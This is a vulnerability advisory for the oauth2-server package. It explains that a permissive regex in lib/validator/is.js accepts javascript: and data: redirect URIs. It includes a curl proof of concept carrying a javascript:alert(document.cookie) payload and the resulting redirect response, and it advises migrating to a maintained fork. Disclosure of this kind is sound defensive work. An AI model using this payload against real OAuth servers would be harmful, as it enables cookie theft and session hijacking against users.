Affected Package: oauth2-server
Version: v3.1.1 (Latest)
Vulnerability Type: Open Redirect / Cross-Site Scripting (XSS)
The oauth2-server library relies on an insecure Regular Expression to validate the redirect_uri parameter during the OAuth authorization flow. This allows attackers to bypass protocol validation and inject dangerous URI schemes (e.g., javascript:, data:).
In lib/validator/is.js (line 10), the library defines the uri validation regex as follows:
// Vulnerable Regex
uri: /^[a-zA-Z][a-zA-Z0-9+.-]+:/This regex is compliant with RFC 3986 but violates OAuth 2.0 security best practices (RFC 8252). It permissively matches any scheme, including those that execute code in the browser context.
- Setup: Initialize a standard
oauth2-serverinstance. - Attack: Send an authorization request containing a malicious
redirect_uri.
curl -v "http://localhost:3000/oauth/authorize?response_type=code&client_id=test&redirect_uri=javascript:alert(document.cookie)"- Result: The server validates the URI as "correct" and issues a 302 Redirect to the malicious payload.
HTTP/1.1 302 Found
Location: javascript:alert(document.cookie)?code=...If a developer relies on this library to validate Redirect URIs (which is the default behavior), an attacker can perform XSS attacks by tricking a user into clicking a link that redirects to a javascript: payload.
The oauth2-server package is unmaintained. Users are strongly advised to migrate to the community-maintained fork: @node-oauth/node-oauth2-server, which is actively supported.